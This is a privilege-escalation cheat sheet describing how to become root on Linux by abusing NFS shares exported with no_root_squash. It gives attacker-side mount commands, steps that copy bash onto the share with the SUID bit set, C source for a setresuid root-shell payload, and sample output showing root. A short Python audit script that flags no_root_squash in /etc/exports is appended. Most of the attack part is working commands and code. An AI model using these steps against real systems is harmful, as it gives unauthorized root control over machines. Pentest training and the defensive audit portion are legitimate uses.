NFS exploits
Become root on Linux via NFS exploits:
Look for no_root_squash shares
Mount share
Create a payload:
    Bash binary with an SUID bit
    C binary with an SUID bit
Execute the payload on the target machine to escalate privileges
Unmount the shared directory on the attacker machine
Example: /tmp share
Get information:
$ ps aux | grep nfsd
$ cat /etc/exports
There is a /tmp share with no_root_squash set.
Shares with the no_root_squash option can possibly be modified and executed as root.
On the attacker machine, install the NFS client package:
sudo apt install nfs-common
On the attacker machine, create a directory to host the NFS share:
mkdir /tmp/nfs
With sudo, mount the remote share in the /tmp/nfs directory:
sudo mount -o rw,vers=2 <target IP address>:/tmp /tmp/nfs
Or:
sudo mount -t nfs <target IP address>:/tmp /tmp/nfs
Payload
Bash binary with an SUID bit:
sudo cp /bin/bash /tmp/nfs/bash && sudo chmod u+s /tmp/nfs/bash
C binary with an SUID bit - you may need to change the /usr/bin/bash to /bin/bash, depending on the location of bash in the target machine:
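#define _GNU_SOURCE     /* exposes the setresuid() declaration in <unistd.h> */
#include <stdio.h>
#include <stdlib.h>     /* system() */
#include <unistd.h>
#include <sys/types.h>

int main(void) {
    /* Set the real, effective and saved UID to 0 (relies on the SUID bit on a root-owned file). */
    setresuid(0, 0, 0);
    setuid(getuid());
    /* Start a shell that inherits those UIDs. */
    system("/usr/bin/bash");
    return 0;
}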
Compile:
gcc payload.c -o payload && sudo rm /tmp/nfs/payload 2>/dev/null; sudo cp payload /tmp/nfs
Set the SUID bit:
sudo chmod u+s /tmp/nfs/payload
On the target machine, execute the payload to escalate privileges:
:/tmp$ ./bash -p
# whoami
root
# exit
:/tmp$ ./payload
:/tmp# id
uid=0(root) gid=1000(low) ...
Unmount the shared directory on the attacker machine:
sudo umount /tmp/nfs
Notes
The NFS configuration file is /etc/exports:
no_root_squash: This option basically gives authority to the root user on the client (us, our attacker host) to access files on the NFS server as root. This is bad, as we can create malicious files on the NFS share as the root user.
no_all_squash: This is similar to the no_root_squash option but applies to non-root users.
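A server-side check for the /etc/exports notes above, added here as an example that is not part of the original page: it parses exports content and lists every client entry whose effective setting is no_root_squash. The sample file, hosts and paths are constructed; the code assumes export paths contain no whitespace and that a later option overrides an earlier one.

```python
import re

# Constructed sample /etc/exports content (hosts and paths are made up).
SAMPLE_EXPORTS = r"""
/tmp           *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/projects  10.0.0.0/24(rw,sync,root_squash) \
               backup01(rw,no_root_squash)
/srv/build     -rw,no_root_squash ci01 ci02(root_squash)
/home          10.0.0.5(rw,sync)   # root_squash is the default
"""

SPEC_RE = re.compile(r"^([^()]*)(?:\(([^()]*)\))?$")  # client(opt,opt,...)

def logical_lines(text):
    """Yield export entries with comments removed and backslash continuations joined."""
    buf = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        buf += line
        if buf.strip():
            yield buf.strip()
        buf = ""

def audit_exports(text):
    """Return (path, client) pairs whose effective setting is no_root_squash."""
    findings = []
    for entry in logical_lines(text):
        path, *specs = entry.split()  # assumption: no whitespace in export paths
        defaults = []
        for spec in specs:
            if spec.startswith("-"):  # "-opt,opt" sets defaults for later clients
                defaults = spec[1:].split(",")
                continue
            m = SPEC_RE.match(spec)
            if not m:
                continue  # malformed client spec, ignored here
            opts = defaults + (m.group(2).split(",") if m.group(2) else [])
            # Only the last squash option counts; none at all means root_squash.
            squash = [o for o in opts if o in ("root_squash", "no_root_squash")]
            if squash and squash[-1] == "no_root_squash":
                findings.append((path, m.group(1) or "*"))
    return findings

if __name__ == "__main__":
    for path, client in audit_exports(SAMPLE_EXPORTS):
        print(f"no_root_squash: {path} exported to {client}")
```

To audit a real server, pass the contents of its /etc/exports to audit_exports() instead of the sample.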